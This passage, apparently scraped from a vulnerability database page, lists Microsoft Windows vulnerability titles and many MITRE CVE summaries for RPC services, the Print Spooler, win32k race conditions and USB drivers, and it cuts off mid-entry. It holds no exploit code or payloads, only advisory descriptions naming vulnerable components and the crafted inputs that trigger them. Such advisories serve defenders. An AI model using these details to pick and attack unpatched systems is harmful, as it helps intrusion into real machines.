2003 Buffer Overflow Protection unknown vulnerability [278] Microsoft Windows XP ZIP Manager memory corruption [270] Microsoft Windows XP SP1 TCP Packet unknown vulnerability [269] Microsoft Windows up to 98 SP1 UDP Fragment denial of service [261] Microsoft Windows NT 4.0 NetBIOS information disclosure [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [193] Microsoft Windows up to 8.x Media Player unknown vulnerability [179] Microsoft Windows XP desktop.ini memory corruption [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [165] Microsoft Windows NT 4.0/2000/XP SMB memory corruption [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [124] Microsoft Windows 5 Media Service ISAPI Extension /scripts memory corruption [123] Microsoft Windows 9 Media Player privilege escalation [71] Microsoft Windows Media Player unknown vulnerability [69] Microsoft Windows XP Internet Connection Firewall unknown vulnerability [61] Microsoft Windows XP Media Player 7.1 privilege escalation [41] Microsoft Windows Form Input Type denial of service [9] Microsoft Windows riched20.dll memory corruption [8] Microsoft Windows NT 4.0/2000 cmd.exe cd memory corruption [4] Microsoft Windows 2000 NetBIOS denial of service MITRE CVE - https://cve.mitre.org: [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3139] Untrusted search path vulnerability in Microsoft Windows Progman Group Converter (grpconv.exe) allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse imm.dll that is located in the same folder as a .grp file. [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. [CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2004-0569] The RPC Runtime Library for Microsoft Windows NT 4.0 allows remote attackers to read active memory or cause a denial of service (system crash) via a malicious message, possibly related to improper length values. [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0116] An Activation function in the RPCSS Service involved with DCOM activation for Microsoft Windows 2000, XP, and 2003 allows remote attackers to cause a denial of service (memory consumption) via an activation request with a large length field. [CVE-2003-0807] Buffer overflow in the COM Internet Services and in the RPC over HTTP Proxy components for Microsoft Windows NT Server 4.0, NT 4.0 Terminal Server Edition, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service via a crafted request. [CVE-2003-0352] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms. [CVE-2003-0003] Buffer overflow in the RPC Locator service for Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code via an RPC call to the service containing certain parameter information. [CVE-2002-1141] An input validation error in the Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service via malformed fragmented RPC client packets, aka "Denial of service by sending an invalid RPC request." [CVE-2002-1140] The Sun Microsystems RPC library Services for Unix 3.0 Interix SD, as implemented on Microsoft Windows NT4, 2000, and XP, allows remote attackers to cause a denial of service (service hang) via malformed packet fragments, aka "Improper parameter size check leading to denial of service." [CVE-2001-0509] Vulnerabilities in RPC servers in (1) Microsoft Exchange Server 2000 and earlier, (2) Microsoft SQL Server 2000 and earlier, (3) Windows NT 4.0, and (4) Windows 2000 allow remote attackers to cause a denial of service via malformed inputs. [CVE-2000-0771] Microsoft Windows 2000 allows local users to cause a denial of service by corrupting the local security policy via malformed RPC traffic, aka the "Local Security Policy Corruption" vulnerability. [CVE-2013-3661] The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain. [CVE-2013-3660] The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 does not properly initialize a pointer for the next object in a certain list, which allows local users to obtain write access to the PATHRECORD chain, and consequently gain privileges, by triggering excessive consumption of paged memory and then making many FlattenPath function calls, aka "Win32k Read AV Vulnerability." [CVE-2013-3174] DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability." [CVE-2013-3173] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overwrite Vulnerability." [CVE-2013-3172] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to cause a denial of service (system hang) via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-3167] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Information Disclosure Vulnerability." [CVE-2013-3154] The signature-update functionality in Windows Defender on Microsoft Windows 7 and Windows Server 2008 R2 relies on an incorrect pathname, which allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory, aka "Microsoft Windows 7 Defender Improper Pathname Vulnerability." [CVE-2013-3138] Integer overflow in the TCP/IP kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (system hang) via crafted TCP packets, aka "TCP/IP Integer Overflow Vulnerability." [CVE-2013-3136] The kernel in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 on 32-bit platforms does not properly handle unspecified page-fault system calls, which allows local users to obtain sensitive information from kernel memory via a crafted application, aka "Kernel Information Disclosure Vulnerability." [CVE-2013-3127] The Microsoft WMV video codec in wmv9vcm.dll, wmvdmod.dll in Windows Media Format Runtime 9 and 9.5, and wmvdecod.dll in Windows Media Format Runtime 11 and Windows Media Player 11 and 12 allows remote attackers to execute arbitrary code via a crafted media file, aka "WMV Video Decoder Remote Code Execution Vulnerability." [CVE-2013-2558] Unspecified vulnerability in Microsoft Windows 8 allows remote attackers to cause a denial of service (reboot) or possibly have unknown other impact via a crafted TrueType Font (TTF) file, as demonstrated by the 120612-69701-01.dmp error report. [CVE-2013-2556] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR protection mechanism via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2554] Unspecified vulnerability in Microsoft Windows 7 allows attackers to bypass the ASLR and DEP protection mechanisms via unknown vectors, as demonstrated against Firefox by VUPEN during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0787. [CVE-2013-2553] Unspecified vulnerability in the kernel in Microsoft Windows 7 allows local users to gain privileges via unknown vectors, as demonstrated by Nils and Jon of MWR Labs during a Pwn2Own competition at CanSecWest 2013, a different vulnerability than CVE-2013-0912. [CVE-2013-2552] Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows 8 allows remote attackers to bypass the sandbox protection mechanism by leveraging access to a Medium integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-1345] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Vulnerability." [CVE-2013-1340] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Dereference Vulnerability." [CVE-2013-1339] The Print Spooler in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1337] Microsoft .NET Framework 4.5 does not properly create policy requirements for custom Windows Communication Foundation (WCF) endpoint authentication in certain situations involving passwords over HTTPS, which allows remote attackers to bypass authentication by sending queries to an endpoint, aka "Authentication Bypass Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1333] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1313] Object Linking and Embedding (OLE) Automation in Microsoft Windows XP SP3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted RTF document, aka "OLE Automation Remote Code Execution Vulnerability." [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1299] Microsoft Windows Modern Mail allows remote attackers to spoof link targets via a crafted HTML e-mail message. [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in 